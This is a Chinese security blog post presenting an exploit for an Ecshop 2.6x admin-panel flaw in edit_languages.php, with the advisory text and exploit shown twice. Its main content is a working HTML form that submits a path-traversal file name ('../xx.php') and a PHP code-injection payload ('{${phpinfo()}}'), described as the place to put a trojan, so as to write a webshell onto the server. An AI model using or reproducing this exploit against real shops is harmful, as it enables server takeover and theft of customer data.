发布日期:2010-12.28
发布作者:xhm1n9
影响版本:Ecshop 2.6x
官方网站:http://www.ecshop.com
漏洞类型:设计错误
漏洞描述:相办变量未进行过滤,导致提交数据写入shell漏洞。
adminedit_languages.php
测试方法
<title>ecshop 2.6 后台拿shell by:xhm1n9</title>
<form name="searchForm" action="http://127.1/ecshop2.6/admin/edit_languages.php" method="post">
文件:<input type="text" name="file_path" size="36" value="../xx.php" /><br>任意php文件
关键字: <input type="text" name="item" size="32" value="" /><br>选定文件里的内容
注入语句:<input type="text" name="item_content[]" size="30" value="{${phpinfo()}}" /><br>要替换的马
<input type="hidden" name="item_id" size="30" value="0" /><br>
<input type="submit" value=" 搜索 " class="button" /> <input type="hidden" name="act" value="edit" />
</form>
发布作者:xhm1n9
影响版本:Ecshop 2.6x
官方网站:http://www.ecshop.com
漏洞类型:设计错误
漏洞描述:相办变量未进行过滤,导致提交数据写入shell漏洞。
adminedit_languages.php
测试方法
<title>ecshop 2.6 后台拿shell by:xhm1n9</title>
<form name="searchForm" action="http://127.1/ecshop2.6/admin/edit_languages.php" method="post">
文件:<input type="text" name="file_path" size="36" value="../xx.php" /><br>任意php文件
关键字: <input type="text" name="item" size="32" value="" /><br>选定文件里的内容
注入语句:<input type="text" name="item_content[]" size="30" value="{${phpinfo()}}" /><br>要替换的马
<input type="hidden" name="item_id" size="30" value="0" /><br>
<input type="submit" value=" 搜索 " class="button" /> <input type="hidden" name="act" value="edit" />
</form>
本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:http://yesck.com/post/384/
赞(0)
赏
微软WMITOOLS ActiveX 远程代码执行漏洞
上一篇
2010年12月29日 20:15
IIS处理HTML头缓冲区溢出漏洞
下一篇
2010年12月29日 20:23
本文 暂无 评论